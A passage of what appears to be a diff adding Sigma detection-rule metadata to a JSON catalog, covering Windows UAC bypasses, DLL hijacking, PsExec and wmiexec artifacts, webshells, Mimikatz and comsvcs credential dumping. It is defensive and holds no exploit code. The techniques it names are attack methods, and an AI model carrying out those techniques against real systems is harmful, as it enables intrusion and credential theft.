mean of persistence", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/24", + "falsepositive": [ + "Legitimate use of the profile by developers or administrators" + ], + "filename": "file_event_win_susp_vscode_powershell_profile.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + 
"https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_vscode_powershell_profile.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.013" + ] + }, + "uuid": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", + "value": "VsCode Powershell Profile Modification" + }, + { + "description": "Detects the creation of an file in user Word Startup", + "meta": { + "author": "frack113", + "creation_date": "2022/06/05", + "falsepositive": [ + "Addition of legitimate plugins" + ], + "filename": "file_event_win_susp_winword_startup.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "Malware Sandbox https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_winword_startup.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ] + }, + "uuid": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", + "value": "Creation In User Word Startup Folder" + }, + { + "description": "Detects default PsExec service filename which indicates PsExec service installation and execution", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/06/12", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_tool_psexec.yml", + "level": "low", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_tool_psexec.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "259e5a6a-b8d2-4c38-86e2-26c5e651361d", + "value": "PsExec Service File 
Creation" + }, + { + "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/02/21", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_tsclient_filewrite_startup.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_tsclient_filewrite_startup.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "52753ea4-b3a0-4365-910d-36cff487b789", + "value": "Hijack Legit RDP Session to Move Laterally" + }, + { + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_uac_bypass_consent_comctl32.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "62ed5b55-f991-406a-85d9-e8e8fdf18789", + "value": "UAC Bypass Using Consent and Comctl32 - File" + }, + { + "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_uac_bypass_dotnet_profiler.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "value": "UAC Bypass Using .NET Code Profiler on MMC" + }, + { + "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", + "meta": { + "author": "Antonio Cocomazzi (idea), Florian Roth (rule)", + "creation_date": "2022/04/27", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_uac_bypass_eventvwr.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw", + "https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g", + "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation" + ] + }, + "uuid": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", + "value": "UAC Bypass Using EventVwr" + }, + { + "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/03", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/Wh04m1001/IDiagnosticProfileUAC", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + 
"attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "48ea844d-19b1-4642-944e-fe39c2cc1fec", + "value": "UAC Bypass Using IDiagnostic Profile - File" + }, + { + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_uac_bypass_ieinstal.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ieinstal.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", + "value": "UAC Bypass Using IEInstal - File" + }, + { + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_uac_bypass_msconfig_gui.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "41bb431f-56d8-4691-bb56-ed34e390906f", + "value": "UAC Bypass Using MSConfig Token Modification - File" + }, + { + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml", + "level": "high", + 
"logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", + "value": "UAC Bypass Using NTFS Reparse Point - File" + }, + { + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_uac_bypass_winsat.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_winsat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "155dbf56-e0a4-4dd0-8905-8a98705045e8", + "value": "UAC Bypass Abusing Winsat Path Parsing - File" + }, + { + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_uac_bypass_wmp.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_wmp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "68578b43-65df-4f81-9a9b-92f32711a951", + "value": "UAC Bypass Using Windows Media Player - File" + }, + { + 
"description": "Possible webshell file creation on a static web site", + "meta": { + "author": "Beyu Denis, oscd.community, Tim Shelton", + "creation_date": "2019/10/22", + "falsepositive": [ + "Legitimate administrator or developer creating legitimate executable files in a web application folder" + ], + "filename": "file_event_win_webshell_creation_detect.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "PT ESC rule and personal experience", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_webshell_creation_detect.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", + "value": "Windows Webshell Creation" + }, + { + "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", + "meta": { + "author": "frack113", + "creation_date": "2022/05/09", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_werfault_dll_hijacking.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_werfault_dll_hijacking.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001" + ] + }, + "uuid": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", + "value": "Creation of an WerFault.exe in Unusual Folder" + }, + { + "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", + "meta": { + "author": "Julia Fomina, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_winrm_awl_bypass.yml", + "level": "medium", + "logsource.category": 
"file_event", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", + "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File" + }, + { + "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", + "meta": { + "author": "Florian Roth, Sittikorn S", + "creation_date": "2021/09/10", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_winword_cve_2021_40444.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/RonnyTNL/status/1436334640617373699?s=20", + "https://twitter.com/vanitasnk/status/1437329511142420483?s=21", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winword_cve_2021_40444.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587" + ] + }, + "uuid": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", + "value": "Suspicious Word Cab File Write CVE-2021-40444" + }, + { + "description": "Detects the creation of the default output filename used by the wmicexec tool", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/02", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_wmiexec_default_filename.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml" + ], + "tags": [ + 
"attack.lateral_movement", + "attack.t1047" + ] + }, + "uuid": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", + "value": "Wmiexec Default Output File" + }, + { + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "614a7e17-5643-4d89-b6fe-f9df1a79641c", + "value": "Wmiprvse Wbemcomn DLL Hijack - File" + }, + { + "description": "Detects file writes of WMI script event consumer", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2018/03/07", + "falsepositive": [ + "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" + ], + "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmi_persistence_script_event_consumer_write.yml" + ], + "tags": [ + "attack.t1546.003", + "attack.persistence" + ] + }, + "uuid": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "value": "WMI Persistence - Script Event Consumer File Write" + }, + { + "description": "Detects creation of 
template files for Microsoft Office from outside Office", + "meta": { + "author": "Max Altgelt", + "creation_date": "2022/06/02", + "falsepositive": [ + "Loading a user environment from a backup or a domain controller", + "Synchronization of templates" + ], + "filename": "file_event_win_word_template_creation.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_word_template_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137" + ] + }, + "uuid": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "value": "Office Template Creation" + }, + { + "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/18", + "falsepositive": [ + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + ], + "filename": "file_event_win_wpbbin_persistence.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c", + "https://persistence-info.github.io/Data/wpbbin.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" + ] + }, + "uuid": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", + "value": "UEFI Persistence Via Wpbbin - FileCreation" + }, + { + "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique 
is used by post-exploitation frameworks.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_writing_local_admin_share.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-4---execute-command-writing-output-to-local-admin-share", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_writing_local_admin_share.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1546.002" + ] + }, + "uuid": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", + "value": "Writing Local Admin Share" + }, + { + "description": "Detects cases in which a file gets renamed to .dll, which often happens to bypass perimeter protection", + "meta": { + "author": "frack113", + "creation_date": "2022/02/19", + "falsepositive": [ + "Application installation" + ], + "filename": "file_rename_win_not_dll_to_dll.yml", + "level": "medium", + "logsource.category": "file_rename", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/ffforward/status/1481672378639912960", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036/T1036.md#atomic-test-1---system-file-copied-to-unusual-location", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_not_dll_to_dll.yml" + ], + "tags": "No established tags" + }, + "uuid": "bbfd974c-248e-4435-8de6-1e938c79c5c1", + "value": "Rename Common File to DLL File" + }, + { + "description": "Detects possible ransomware adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\" etc.", + "meta": { + "author": "frack113", + "creation_date": "2022/07/16", + "falsepositive": [ + "Backup software" + ], + "filename": 
"file_rename_win_ransomware.yml", + "level": "medium", + "logsource.category": "file_rename", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/", + "https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_ransomware.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ] + }, + "uuid": "e3f673b3-65d1-4d80-9146-466f8b63fa99", + "value": "Suspicious Appended Extension" + }, + { + "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account)\nwanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", + "meta": { + "author": "Den Iuzvyk", + "creation_date": "2020/07/15", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_abusing_azure_browser_sso.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_abusing_azure_browser_sso.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.002" + ] + }, + "uuid": "50f852e6-af22-4c78-9ede-42ef36aa3453", + "value": "Abusing Azure Browser SSO" + }, + { + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2019/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_alternate_powershell_hosts_moduleload.yml", + 
"level": "low", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190610201010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_alternate_powershell_hosts_moduleload.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "fe6e002f-f244-4278-9263-20e4b593827f", + "value": "Alternate PowerShell Hosts - Image" + }, + { + "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2022/08/02", + "falsepositive": [ + "Very unlikely" + ], + "filename": "image_load_defender_load_dll_from_nondefault_path.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_defender_load_dll_from_nondefault_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", + "value": "Microsoft Defender Loading DLL from Nondefault Path" + }, + { + "description": "Detects DLL image load activity as used by FoggyWeb backdoor loader", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/09/27", + "falsepositive": [ + "Unlikely" + ], + "filename": "image_load_foggyweb_nobelium.yml", + "level": "critical", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_foggyweb_nobelium.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587" + ] + }, + "uuid": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", + "value": "FoggyWeb Backdoor DLL Loading" + }, + { + "description": "Detects loading of essential DLL used by PowerShell, but not by the process powershell.exe. Detects meterpreter's \"load powershell\" extension.", + "meta": { + "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton", + "creation_date": "2019/11/14", + "falsepositive": [ + "Used by some .NET binaries, minimal on user workstation.", + "Used by Microsoft SQL Server Management Studio" + ], + "filename": "image_load_in_memory_powershell.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=2921", + "https://github.com/p3nt4/PowerShdll", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_in_memory_powershell.yml" + ], + "tags": [ + "attack.t1059.001", + "attack.execution" + ] + }, + "uuid": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", + "value": "In-memory PowerShell" + }, + { + "description": "Detects certain DLL loads when Mimikatz gets executed", + "meta": { + "author": "sigma", + "creation_date": "2017/03/13", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_mimikatz_inmemory_detection.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://securityriskadvisors.com/blog/post/detecting-in-memory-mimikatz/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_mimikatz_inmemory_detection.yml" + ], + "tags": [ + "attack.s0002", + "attack.t1003", + "attack.lateral_movement", + "attack.credential_access", + "car.2019-04-004" + ] + }, + "uuid": "c0478ead-5336-46c2-bd5e-b4c84bc3a36e", + "value": "Mimikatz In-Memory" + }, + { + "description": 
"Detects both of CVE-2022-30190 / Follina and DogWalk vulnerability exploiting msdt.exe binary to load sdiageng.dll binary", + "meta": { + "author": "Greg (rule)", + "creation_date": "2022/06/17", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_msdt_sdiageng.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_msdt_sdiageng.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202", + "cve.2022.30190" + ] + }, + "uuid": "ec8c4047-fad9-416a-8c81-0f479353d7f6", + "value": "MSDT.exe Loading Diagnostic Library" + }, + { + "description": "Detects processes loading modules related to PCRE.NET package", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/29", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_pcre_net_load.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/rbmaslen/status/1321859647091970051", + "https://twitter.com/tifkin_/status/1321916444557365248", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_pcre_net_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "84b0a8f3-680b-4096-a45b-e9a89221727c", + "value": "PCRE.NET Package Image Load" + }, + { + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/05/05", + "falsepositive": [ + "Very unlikely" + ], + "filename": "image_load_pingback_backdoor.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + 
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", + "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_pingback_backdoor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.001" + ] + }, + "uuid": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", + "value": "Pingback Backdoor - Image" + }, + { + "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/14", + "falsepositive": [ + "Unlikely" + ], + "filename": "image_load_rundll32_loading_renamed_comsvcs.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1555200155351228419", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_rundll32_loading_renamed_comsvcs.yml" + ], + "tags": [ + "attack.credential_access", + "attack.defense_evasion", + "attack.t1003.001" + ] + }, + "uuid": "8cde342c-ba48-4b74-b615-172c330f2e93", + "value": "Rundll32 Loading Renamed Comsvcs DLL" + }, + { + "description": "Detects signs of the WMI script host process %SystemRoot%\\system32\\wbem\\scrcons.exe functionality being used via images being loaded by a process.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/09/02", + "falsepositive": [ + "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + ], + "filename": "image_load_scrcons_imageload_wmi_scripteventconsumer.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/HunterPlaybook/status/1301207718355759107", + 
"https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/", + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_scrcons_imageload_wmi_scripteventconsumer.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" + ] + }, + "uuid": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", + "value": "WMI Script Host Process Image Loaded" + }, + { + "description": "Detects DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "creation_date": "2022/08/17", + "falsepositive": [ + "Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.", + "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", + "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" + ], + "filename": "image_load_side_load_antivirus.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_antivirus.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "552b6b65-df37-4d3e-a258-f2fc4771ae54", + "value": "Antivirus Software DLL Sideloading" + }, + { + "description": "Detects DLL sideloading of \"dbgcore.dll\"", + "meta": { + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "creation_date": "2022/10/25", + "falsepositive": [ + 
